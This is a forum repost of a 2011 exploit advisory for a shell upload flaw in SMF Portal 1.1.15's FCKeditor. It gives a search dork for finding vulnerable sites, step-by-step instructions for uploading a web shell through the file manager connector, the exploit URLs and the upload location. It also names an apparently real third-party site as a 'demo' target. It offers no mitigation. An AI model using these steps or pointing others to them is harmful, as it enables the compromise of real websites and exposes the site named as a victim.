Nytro Posted December 6, 2011 Report Posted December 6, 2011 SMF Portal 1.1.15 Shell UploadAuthored by HELLBOYSMF Portal version 1.1.15 suffers from a shell upload vulnerabilityPosted Dec 6, 2011 In The Name Of GOD============================================================================== SMF Portal 1.1.15 (fckeditor) Arbitrary File Upload Vulnerability============================================================================== [»] Title : [ SMF Portal 1.1.15 (fckeditor) Arbitrary File Upload Vulnerability ] [»] TestedON: [ LINUX ] [»] Download: [ http://www.simplemachines.org/ ] [»] Author : [ HELLBOY } [»] Email : [ A68_HELLBOY@YAHOO.COM ] [»] Date : [ 2011-12-2 ] [»] Version : [ 1.1.15 ] [»] Dork : [ "Powered by SMF 1.1.15" ]###########################################################################InformatioN :1. Go to url : http://Target/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php2. SELECT You'r Shell and Click OK.3. Formats can be uploaded (Php6,Jpg,gif,Xml,...)4. Uploaded File Location : Target.com/tp-images/File/File Name###########################################################################===[ Exploit ]=== [»] http://Target/[patch]/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php [»] http://Target/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php===[ Demo ]=== [»] http://theartglassfactory.com/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php===[ We Are : ./Iranian HackerZ ]=== Greetz : BLACK.VIPER , SKOTE_VAHSHAT , KINGCOPE TBH : HELLBOY , BLACK.VIPER , SKOTE_VAHSHAT , KINGCOPE###########################################################################Sursa: http://packetstormsecurity.org/files/107543 Quote
